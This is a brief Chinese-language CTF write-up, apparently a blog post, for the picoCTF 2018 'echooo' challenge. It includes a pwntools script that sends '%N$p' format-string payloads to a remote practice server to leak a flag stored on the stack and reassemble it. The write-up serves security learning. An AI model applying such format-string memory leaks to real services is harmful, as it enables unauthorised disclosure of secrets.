picoctf_2018_echooo(fmt)

picoctf_2018_echooo

这题还是蛮有意思的
请添加图片描述

程序分析:

它已经读取flag在栈上了,我们用格式字符串泄露出来flag就好
请添加图片描述
要写个脚本转换下,倒着组合一下

exp:

from pwn import*
#r=process('./PicoCTF_2018_echooo')
r=remote('node4.buuoj.cn',29996)
offest=11+(0x8c-0x4c)/4
print offest
flag=''
for i in range(11):
    payload='%'+str(i+27)+'$p'
    r.sendline(payload)
    r.recvuntil('> 0x')
    num4=int((r.recvuntil('\n')[:-1]),16)
    a=(num4&0xff000000)>>24
    b=(num4&0x00ff0000)>>16
    c=(num4&0x0000ff00)>>8
    d=num4&0x000000ff
    flag+=chr(d)+chr(c)+chr(b)+chr(a)
print flag
r.interactive()

请添加图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值